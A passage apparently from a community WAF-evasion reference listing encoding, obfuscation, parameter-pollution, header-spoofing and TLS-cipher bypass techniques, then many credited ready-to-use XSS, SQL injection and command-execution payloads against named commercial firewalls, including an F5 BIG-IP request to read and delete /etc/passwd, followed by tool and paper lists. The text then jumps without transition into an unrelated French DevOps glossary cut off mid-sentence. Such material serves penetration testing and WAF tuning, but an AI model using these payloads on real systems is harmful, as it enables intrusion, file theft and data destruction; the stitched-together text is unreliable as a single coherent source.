%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd 4. HTML Representation Often web apps encode special characters into HTML encoding and render them accordingly. This leads us to basic bypass cases with HTML encoding (numeric/generic). Standard : "> Encoded : "><img src=x onerror=confirm()> (General form) Encoded : "><img src=x onerror=confirm()> (Numeric reference) 5. Mixed Encoding Sometimes, WAF rules often tend to filter out a specific type of encoding. This type of filters can be bypassed by mixed encoding payloads. Tabs and newlines further add to obfuscation. Obfuscated : XSS 6. Using Comments Comments obfuscate standard payload vectors. Different payloads have different ways of obfuscation. Blocked : Bypassed : Blocked : /?id=1+union+select+1,2,3-- Bypassed : /?id=1+un/**/ion+sel/**/ect+1,2,3-- 7. Double Encoding Often WAF filters tend to encode characters to prevent attacks. However poorly developed filters (no recursion filters) can be bypassed with double encoding. Standard : http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\ Obfuscated : http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\ Standard : Obfuscated : %253Cscript%253Ealert()%253C%252Fscript%253E 8. Wildcard Obfuscation Globbing patterns are used by various command-line utilities to work with multiple files. We can tweak them to execute system commands. Specific to remote code execution vulnerabilities on linux systems. Standard : /bin/cat /etc/passwd Obfuscated : /???/??t /???/??ss?? Used chars: / ? t s Standard : /bin/nc 127.0.0.1 1337 Obfuscated : /???/n? 2130706433 1337 Used chars: / ? n [0-9] 9. Dynamic Payload Generation Different programming languages have different syntaxes and patterns for concatenation. This allows us to effectively generate payloads that can bypass many filters and rules. Standard : Obfuscated : Standard : /bin/cat /etc/passwd Obfuscated : /bi'n'''/c''at' /e'tc'/pa''ss'wd Bash allows path concatenation for execution. Standard : Obfuscated : 13. Token Breakers Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers. Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature. However, the request must still remain valid while using token-breakers. Case : Unknown Token for the Tokenizer Payload : ?id=‘-sqlite_version() UNION SELECT password FROM users -- Case : Unknown Context for the Parser (Notice the uncontexted bracket) Payload 1 : ?id=123);DROP TABLE users -- Payload 2 : ?id=1337) INTO OUTFILE ‘xxx’ -- TIP: More payloads can be crafted via this cheat sheet . 14. Obfuscation in Other Formats Many web applications support different encoding types and can interpret the encoding (see below). Obfuscating our payload to a format not supported by WAF but the server can smuggle our payload in. Case: IIS IIS6, 7.5, 8 and 10 (ASPX v4.x) allow IBM037 character interpretations. We can encode our payload and send the encoded parameters with the query. Original Request: POST /sample.aspx?id1=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41 id2='union all select * from users-- Obfuscated Request + URL Encoding: POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=ibm037 Content-Length: 115 %89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60 The following table shows the support of different character encodings on the tested systems (when messages could be obfuscated using them): TIP: You can use this small python script to convert your payloads and parameters to your desired encodings. Target Encodings Notes Nginx, uWSGI-Django-Python3 IBM037, IBM500, cp875, IBM1026, IBM273 Query string and body need to be encoded. Url-decoded parameters in query string and body. Equal sign and ampersand needed to be encoded as well (no url-encoding). Nginx, uWSGI-Django-Python2 IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424 Query string and body need to be encoded. Url-decoded parameters in query string and body afterwards. Equal sign and ampersand should not be encoded in any way. Apache-TOMCAT8-JVM1.8-JSP IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 Query string in its original format (could be url-encoded as usual). Body could be sent with/without url-encoding. Equal sign and ampersand should not be encoded in any way. Apache-TOMCAT7-JVM1.6-JSP IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 Query string in its original format (could be url-encoded as usual). Body could be sent with/without url-encoding. Equal sign and ampersand should not be encoded in any way. IIS6, 7.5, 8, 10 -ASPX (v4.x) IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 Query string in its original format (could be url-encoded as usual). Body could be sent with/without url-encoding. Equal sign and ampersand should not be encoded in any way. HTTP Parameter Pollution Method: This attack method is based on how a server interprets parameters with the same names. Possible bypass chances here are: The server uses the last received parameter, and WAF checks only the first. The server unites the value from similar parameters, and WAF checks them separately. Technique: The idea is to enumerate how the parameters are being interpreted by the server. In such a case we can pass the payload to a parameter which isn't being inspected by the WAF. Distributing a payload across parameters which can later get concatenated by the server is also useful. Below is a comparison of different servers and their relative interpretations: Environment Parameter Interpretation Example ASP/IIS Concatenation by comma par1=val1,val2 JSP, Servlet/Apache Tomcat First parameter is resulting par1=val1 ASP.NET/IIS Concatenation by comma par1=val1,val2 PHP/Zeus Last parameter is resulting par1=val2 PHP/Apache Last parameter is resulting par1=val2 JSP, Servlet/Jetty First parameter is resulting par1=val1 IBM Lotus Domino First parameter is resulting par1=val1 IBM HTTP Server Last parameter is resulting par1=val2 mod_perl, libapeq2/Apache First parameter is resulting par1=val1 Oracle Application Server 10G First parameter is resulting par1=val1 Perl CGI/Apache First parameter is resulting par1=val1 Python/Zope First parameter is resulting par1=val1 IceWarp An array is returned ['val1','val2'] AXIS 2400 Last parameter is resulting par1=val2 DBMan Concatenation by two tildes par1=val1~~val2 mod-wsgi (Python)/Apache An array is returned ARRAY(0x8b9058c) HTTP Parameter Fragmentation HPF is based on the principle where the server unites the value being passed along the parameters. We can split the payload into different components and then pass the values via the parameters. Sample Payload : 1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS Sample Query URL : http://test.com/url?a=1001+RLIKE&b=(-(-1))+UNION&c=SELECT+1&d=FROM+CREDIT_CARDS TIP: A real life example how bypasses can be crafted using this method can be found here . Browser Bugs: Charset Bugs: We can try changing charset header to higher Unicode (eg. UTF-32) and test payloads. When the site decodes the string, the payload gets triggered. Example request: GET /page.php?p=∀㾀㰀script㾀alert(1)㰀/script㾀 HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept-Charset:utf-32; q=0.5 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate When the site loads, it will be encoded to the UTF-32 encoding that we set, and then as the output encoding of the page is UTF-8, it will be rendered as: " Case: SQLi SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null); 1%0b||%0bLPAD(USER,7,1) Many alternatives to the original JavaScript can be used, namely: JSFuck JJEncode XChars.JS However the problem in using the above syntactical structures is the long payloads which might possibly be detected by the WAF or may be blocked by the CSP. However, you never know, they might bypass the CSP (if present) too. ;) Abusing SSL/TLS Ciphers: Many a times, servers do accept connections from various SSL/TLS ciphers and versions. Using a cipher to initialise a connection to server which is not supported by the WAF can do our workload. Technique: Dig out the ciphers supported by the firewall (usually the WAF vendor documentation discusses this). Find out the ciphers supported by the server (tools like SSLScan helps here). If a specific cipher not supported by WAF but by the server, is found, voila! Initiating a new connection to the server with that specific cipher should smuggle our payload in. Tool : abuse-ssl-bypass-waf python abuse-ssl-bypass-waf.py -thread 4 -target CLI tools like cURL can come very handy for PoCs: curl --ciphers -G -d Abuse WAF limit on HTTP Responses Method Many a times, WAFs have a limit on how much of the HTTP request they are meant to handle. By sending a HTTP request with a size greater than the limit , we can fully evade WAFs. Technique Use a hit and trial approach to find out how much of the HTTP request is being inspected by the WAF (usually in multiples of 4 kB). Once done, attach your payload to the request after filling the limit with garbage. A similar technique was used to bypass Google Cloud Platform WAF . Abusing DNS History: Often old historical DNS records provide information about the location of the site behind the WAF. The target is to get the location of the site, so that we can route our requests directly to the site and not through the WAF. TIP: Some online services like IP History and DNS Trails come to the rescue during the recon process. Tool : bypass-firewalls-by-DNS-history bash bypass-firewalls-by-DNS-history.sh -d --checkall Using Whitelist Strings: Method: Some WAF developers keep a shared secret with their users/devs which allows them to pass harmful queries through the WAF. This shared secret, if leaked/known, can be used to bypass all protections within the WAF. Technique: Using the whitelist string as a parameter in GET/POST/PUT/DELETE requests smuggles our payload through the WAF. Usually some *-sync-request keywords or a shared token value is used as the secret. Often adding specific headers may trigger a similar whitelist behaviour. Now when making a request to the server, you can append it as a parameter: http://host.com/?randomparameter=&=True A real life example how this works can be found at this blog . Request Header Spoofing: Method: The target is to fool the WAF/server into believing it was from their internal network. Adding some spoofed headers to represent the internal network, does the trick. Technique: With each request some set of headers are to be added simultaneously thus spoofing the origin. The upstream proxy/WAF misinterprets the request was from their internal network, and lets our gory payload through. Some common headers used: X-Originating-IP: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1 Google Dorks Approach: Method: There are a lot of known bypasses of various web application firewalls ( see section ). With the help of google dorks, we can easily find bypasses. Techniques: Before anything else, you should hone up skills from Google Dorks Cheat Sheet . Normal search: + waf bypass Searching for specific version exploits: " " (bypass|exploit) For specific type bypass exploits: "" + (bypass|exploit) On Exploit DB : site:exploit-db.com + bypass On 0Day Inject0r DB : site:0day.today + (bypass|exploit) On Twitter : site:twitter.com + bypass On Pastebin site:pastebin.com + bypass Known Bypasses: Airlock Ergon SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult %C0%80'+union+select+col1,col2,col3+from+table+--+ AWS SQLi Bypass by @enkaskal "; select * from TARGET_TABLE -- XSS Bypass by @kmkz : aa Keep-Alive: 300 R-XSS Bypass by @WAFNinja XSS Bypass by @0xInfection

alert dragme click GET - XSS Bypass (v4.02) by @DavidK /search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E POST - XSS Bypass (v4.02) by @DavidK clave XSS (v4.02) by @DavidK /?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ Fortinet Fortiweb pcre_expression unvaidated XSS by @Benjamin Mejri /waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C /waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 CSP Bypass by @Binar10 POST Type Query POST //login-app.aspx HTTP/1.1 Host: User-Agent: Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: var1=datavar1&var2=datavar12&pad= GET Type Query http:///path?var1=vardata1&var2=vardata2&pad= F5 ASM XSS Bypass by @WAFNinja
"/>a F5 BIG-IP XSS Bypass by @WAFNinja

Right-Click Here
Right-Click Here XSS Bypass by @Aatif Khan
Right-Click Here ]> &e; Directory Traversal by @Anastasios Monachos Read Arbitrary File /tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd Delete Arbitrary File POST /tmui/Control/form HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd Content-Type: application/x-www-form-urlencoded _form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete F5 FirePass SQLi Bypass from @Anonymous state=%2527+and+ (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+ BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ ModSecurity XSS Bypass for CRS 3.2 by @brutelogic RCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1) ;+$u+cat+/etc$u/passwd$u RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1) ;+$u+cat+/etc$u/passwd+\# RCE Payloads for PL1 and PL2 by @theMiddle (v3.0) /???/??t+/???/??ss?? RCE Payloads for PL3 by @theMiddle (v3.0) /?in/cat+/et?/passw? SQLi Bypass by @Johannes Dahse (v2.2) 0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user SQLi Bypass by @Yuri Goltsev (v2.2) 1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min') SQLi Bypass by @Ahmad Maulana (v2.2) 1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*- SQLi Bypass by @Travis Lee (v2.2) amUserId=1 union select username,password,3,4 from users SQLi Bypass by @Roberto Salgado (v2.2) %0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201 SQLi Bypass by @Georgi Geshev (v2.2) 1%0bAND(SELECT%0b1%20FROM%20mysql.x) SQLi Bypass by @SQLMap Devs (v2.2) %40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29 SQLi Bypass by @HackPlayers (v2.2) %0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201 Imperva XSS Bypass by @smaury92 XSS Bypass by @0xInfection clickme XSS Bypass by @0xInfection click XSS Bypass by @0xInfection pew XSS Bypass by @ugurercan
Imperva SecureSphere 13 - Remote Command Execution by @rsp3ar XSS Bypass by @David Y XSS Bypass by @Emad Shanab anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz XSS Bypass by @WAFNinja %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E XSS Bypass by @i_bo0om XSS Bypass by @c0d3g33k SQLi Bypass by @DRK1WI 15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' SQLi by @Giuseppe D'Amore stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1 Imperva SecureSphere <= v13 - Privilege Escalation by @0x09AL Kona SiteDefender XSS Bypass by @SaadAhmed %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E XSS Bypass by @h1_kenan asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie) HTML Injection by @sp1d3rs %2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E XSS Bypass by @Jonathan Bouman XSS Bypass by @0xInfection XSS Bypass by @sp1d3rs %2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E XSS Bypass by @Frans Rosén XSS Bypass by @Ishaq Mohammed Profense GET Type CSRF Attack by @Michael Brooks (>= v.2.6.2) Turn off Proface Machine Add a proxy XSS Bypass by @Michael Brooks (>= v.2.6.2) https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>" XSS Bypass by @EnableSecurity (>= v2.4) %3CEvil%20script%20goes%20here%3E=%0AByPass %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E QuickDefense XSS Bypass by @WAFNinja ?
Sucuri XSS Bypass (POST Only) by @brutelogic Smuggling RCE Payloads by @theMiddle /???/??t+/???/??ss?? Obfuscating RCE Payloads by @theMiddle ;+cat+/e'tc/pass'wd c\\a\\t+/et\\c/pas\\swd XSS Bypass by @Luka "> XSS Bypass by @Brute Logic data:text/html,
StackPath XSS Bypass by @0xInfection Right-Click Here SQLi by @WAFNinja 0 union(select 1,username,password from(users)) 0 union(select 1,@@hostname,@@datadir) XSS Bypass by @Aatif Khan (v4.1)
Right-Click Here SQLi Bypass by @ZeQ3uL 10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables) Wordfence XSS Bypass by @brute Logic XSS Bypass by @0xInfection click HTML Injection by @Voxel http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php XSS Exploit by @MustLive (>= v3.3.5) Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua
Other XSS Bypasses >
" >> Apache Generic Writing method type in lowercase by @i_bo0om get /login HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) IIS Generic Tabs before method by @i_bo0om GET /login.php HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Awesome Tools Fingerprinting: WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity . IdentYwaf - A blind WAF detection tool which utlises a unique method of identifying WAFs based upon previously collected fingerprints by @stamparm . Testing: GoTestWAF - A tool to test a WAF's detection logic and bypasses from @wallarm . Lightbulb Framework - A WAF testing suite written in Python. WAFBench - A WAF performance testing suite by Microsoft . WAF Testing Framework - A WAF testing tool by Imperva . Framework for Testing WAFs (FTW) - A framework by the OWASP CRS team that helps to provide rigorous tests for WAF rules by using the OWASP Core Ruleset V3 as a baseline. Evasion: WAFNinja - A smart tool which fuzzes and can suggest bypasses for a given WAF by @khalilbijjou . WAFTester - Another tool which can obfuscate payloads to bypass WAFs by @Raz0r . libinjection-fuzzer - A fuzzer intended for finding libinjection bypasses but can be probably used universally. bypass-firewalls-by-DNS-history - A tool which searches for old DNS records for finding actual site behind the WAF. abuse-ssl-bypass-waf - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs. SQLMap Tamper Scripts - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs. Bypass WAF BurpSuite Plugin - A plugin for Burp Suite which adds some request headers so that the requests seem from the internal network. enumXFF - Eumerating IPs in X-Forwarded-Headers to bypass 403 restrictions WAF Bypass Tool - WAF bypass Tool from Nemesida is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Management: AWS Firewall Factory - Deploy, update, and stage your WAFs while managing them centrally via FMS. Blogs and Writeups Many of the content mentioned above have been taken from some of the following excellent writeups. Web Application Firewall (WAF) Evasion Techniques #1 - By @Secjuice . Web Application Firewall (WAF) Evasion Techniques #2 - By @Secjuice . Web Application Firewall (WAF) Evasion Techniques #3 - By @Secjuice . How To Exploit PHP Remotely To Bypass Filters & WAF Rules - By @Secjuice ModSecurity SQL Injection Challenge: Lessons Learned - By @SpiderLabs . XXE that can Bypass WAF - By @WallArm . SQL Injection Bypassing WAF - By @OWASP . How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing - By @SunnyHoi . Bypassing Web-Application Firewalls by abusing SSL/TLS - By @0x09AL . Request Encoding to Bypass WAFs - By @Soroush Dalili Video Presentations WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior from @OWASP . Confessions of a WAF Developer: Protocol-Level Evasion of Web App Firewalls from BlackHat USA 12 . Web Application Firewall - Analysis of Detection Logic from BlackHat . Bypassing Browser Security Policies for Fun & Profit from BlackHat . Web Application Firewall Bypassing from Positive Technologies . Fingerprinting Filter Rules of Web Application Firewalls - Side Channeling Attacks from @UseNix . Evading Deep Inspection Systems for Fun and Shell from BlackHat US 13 . Bypass OWASP CRS && CWAF (WAF Rule Testing - Unrestricted File Upload) from Fools of Security . WAFs FTW! A modern devops approach to security testing your WAF from AppSec USA 17 . Web Application Firewall Bypassing WorkShop from OWASP . Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch from Rafay Bloch . WTF - WAF Testing Framework from AppSecUSA 13 . The Death of a Web App Firewall from Brian McHenry . Adventures with the WAF from BSides Manchester . Bypassing Intrusion Detection Systems from BlackHat . Building Your Own WAF as a Service and Forgetting about False Positives from Auscert . Presentations & Research Papers Research Papers: Protocol Level WAF Evasion - A protocol level WAF evasion techniques and analysis by Qualys . Neural Network based WAF for SQLi - A paper about building a neural network based WAF for detecting SQLi attacks. Bypassing Web Application Firewalls with HTTP Parameter Pollution - A research paper from Exploit DB about effectively bypassing WAFs via HTTP Parameter Pollution. Poking A Hole in the Firewall - A paper by Rafay Baloch about modern firewall analysis. Modern WAF Fingerprinting and XSS Filter Bypass - A paper by Rafay Baloch about WAF fingerprinting and bypassing XSS filters. WAF Evasion Testing - A WAF evasion testing guide from SANS . Side Channel Attacks for Fingerprinting WAF Filter Rules - A paper about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12 . WASC WAF Evaluation Criteria - A guide for WAF Evaluation from Web Application Security Consortium . WAF Evaluation and Analysis - A paper about WAF evaluation and analysis of 2 most used WAFs (ModSecurity & WebKnight) from University of Amsterdam . Bypassing all WAF XSS Filters - A paper about bypassing all XSS filter rules and evading WAFs for XSS. Beyond SQLi - Obfuscate and Bypass WAFs - A research paper from Exploit Database about obfuscating SQL injection queries to effectively bypass WAFs. Bypassing WAF XSS Detection Mechanisms - A research paper about bypassing XSS detection mechanisms in WAFs. Presentations: Methods to Bypass a Web Application Firewall - A presentation from PT Security about bypassing WAF filters and evasion. Web Application Firewall Bypassing (How to Defeat the Blue Team) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by @OWASP . WAF Profiling & Evasion Techniques - A WAF testing and evasion guide from OWASP . Protocol Level WAF Evasion Techniques - A presentation at about efficiently evading WAFs at protocol level from BlackHat US 12 . Analysing Attacking Detection Logic Mechanisms - A presentation about WAF logic applied to detecting attacks from BlackHat US 16 . WAF Bypasses and PHP Exploits - A presentation about evading WAFs and developing related PHP exploits. Side Channel Attacks for Fingerprinting WAF Filter Rules - A presentation about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12 . Our Favorite XSS Filters/IDS and how to Attack Them - A presentation about how to evade XSS filters set by WAF rules from BlackHat USA 09 . Playing Around with WAFs - A small presentation about WAF profiling and playing around with them from Defcon 16 . A Forgotten HTTP Invisibility Cloak - A presentation about techniques that can be used to bypass common WAFs from BSides Manchester . Building Your Own WAF as a Service and Forgetting about False Positives - A presentation about how to build a hybrid mode waf that can work both in an out-of-band manner as well as inline to reduce false positives and latency Auscert2019 . Credits & License: Initial fingerprint compilation and bypasses were put together by Pinaki (0xInfection) , but now it largely remains as a community supported repository. Awesome-WAF is licensed under the Apache 2.0 License . Glossaire DevOps Agile Un framework agile une structure mĂ©thodologique qui fournit des lignes directrices, des pratiques, et des processus pour aider les Ă©quipes Ă  organiser, planifier, exĂ©cuter et suivre leur travail de maniĂšre itĂ©rative et collaborative. Ce dĂ©veloppement itĂ©ratif dĂ©coupe un projet en sous-projets pour lesquels, on se fixe des objectifs Ă  court termes atteignables. Ces sous-projets sont appelĂ©s des sprints et sont de courtes durĂ©es. Le but d’un framework agile est de livrer rapidement au client une premiĂšre version du produit qui correspond Ă  ses besoins, qui Ă©voluera ensuite au fil des versions. Framework agiles : Scrum, eXtrem Programming, 
 Air Gap “Air Gap” (littĂ©ralement « coupure d’air ») est une mesure de sĂ©curitĂ© dans laquelle un ordinateur ou un rĂ©seau est isolĂ© physiquement de tout autre rĂ©seau, y compris Internet. Cette isolation est souvent rĂ©alisĂ©e en s’assurant qu’aucune connexion physique ou sans fil ne relie l’ordinateur ou le rĂ©seau en question Ă  des systĂšmes externes. L’idĂ©e est de protĂ©ger les donnĂ©es et les systĂšmes contre les accĂšs non autorisĂ©s, les cyberattaques et les logiciels malveillants en Ă©liminant toute voie d’accĂšs directe. Artefacts Les artefacts sont des Ă©lĂ©ments gĂ©nĂ©rĂ©s lors du processus d’intĂ©gration continue Ă  partir d’un code source. Il peut ĂȘtre composĂ© de bibliothĂšques, de fichiers de configuration, d’exĂ©cutables, de fichiers de documentation, etc. Adresse IP Les adresses IP sont des identifiants numĂ©riques attribuĂ©s aux dispositifs connectĂ©s Ă  un rĂ©seau, leur permettant de communiquer entre eux sur Internet ou au sein d’un rĂ©seau local. API Une API, ou Interface de Programmation d’Applications (Application Programming Interface), est un ensemble de rĂšgles et de protocoles pour la construction et l’interaction de logiciels. Elle permet Ă  diffĂ©rents programmes ou composants logiciels de communiquer entre eux. Une API dĂ©finit la maniĂšre dont les fonctions d’un programme peuvent ĂȘtre utilisĂ©es par d’autres programmes, facilitant ainsi leur intĂ©gration et leur interaction sans avoir besoin de connaĂźtre les dĂ©tails de leur mise en Ɠuvre interne. Cela rend les processus de dĂ©veloppement plus rapides et plus flexibles, permettant aux dĂ©veloppeurs de crĂ©er des applications complexes et interconnectĂ©es. Automatisation Fonctionnement d’un systĂšme sans intervention humaine, automatisation d’une suite d’opĂ©ration. Elle peut ĂȘtre faĂźte via l’utilisation de scripts et/ou d’outils qui vont permettre de rĂ©duire la charge de travail manuelle et accĂ©lĂ©rer les tĂąches rĂ©pĂ©titives. Autre avantage, elle limite la part des incidents dus Ă  des erreurs humaines. Build Le build est la phase appelĂ©e aussi intĂ©gration. Elle consiste Ă  assembler le code des dĂ©veloppeurs avec toutes ses dĂ©pendances afin de fournir un livrable de l’application. Dans cette phase, on retrouve, l’analyse du code (lint), les tests unitaires et la compilation. CaaS CaaS, ou Container as a Service, est un modĂšle de service cloud qui permet aux utilisateurs de tĂ©lĂ©charger, organiser, exĂ©cuter, Ă©chelonner, gĂ©rer et arrĂȘter des conteneurs en utilisant une plateforme d’hĂ©bergement basĂ©e sur le cloud. Campagne de patchs Une campagne de patch est un processus visant Ă  appliquer des correctifs (patches) amĂ©liorant la sĂ©curitĂ© et la stabilitĂ© Ă  un ensemble de systĂšmes, de logiciels ou d’infrastructures informatiques de maniĂšre coordonnĂ©e. Ces correctifs sont conçus pour rĂ©soudre des failles de sĂ©curitĂ©, des bogues ou pour amĂ©liorer les performances d’un logiciel ou d’un systĂšme. CI/CD CI/CD (Continuous Integration / Continuous Deployment) : Pratiques visant Ă  automatiser le processus d’intĂ©gration, de test et de dĂ©ploiement pour livrer rapidement et rĂ©guliĂšrement des mises Ă  jour logicielles. CLI Une CLI, ou Command Line Interface (Interface en Ligne de Commande), est une interface utilisateur qui permet aux utilisateurs d’interagir avec un logiciel ou un systĂšme d’exploitation en tapant des commandes textuelles dans un terminal ou une console. Cloud Le cloud fait rĂ©fĂ©rence Ă  la fourniture de services informatiques tels que le stockage, le calcul, les bases de donnĂ©es, la mise en rĂ©seau, l’analyse, etc., via Internet. PlutĂŽt que de possĂ©der et de gĂ©rer physiquement des serveurs et des infrastructures informatiques, les entreprises et les individus peuvent accĂ©der Ă  ces ressources Ă  partir de serveurs distants exploitĂ©s par des fournisseurs de cloud publics . Cloud Hybride Un cloud hybride est un environnement informatique qui combine Ă  la fois des ressources de cloud public et de cloud privĂ© , permettant aux donnĂ©es et aux applications de s’exĂ©cuter de maniĂšre transparente entre les deux. ConcrĂštement, cela signifie que les entreprises peuvent dĂ©ployer des applications et des donnĂ©es Ă  la fois sur des serveurs et des infrastructures internes (cloud privĂ©) et sur des ressources de cloud public, le tout dans un environnement cohĂ©rent. Cluster Un cluster est un groupe de machines (nƓuds) interconnectĂ©es qui travaillent ensemble pour exĂ©cuter des applications conteneurisĂ©es. Dans le cadre de Kubernetes, un cluster est constituĂ© d’un plan de 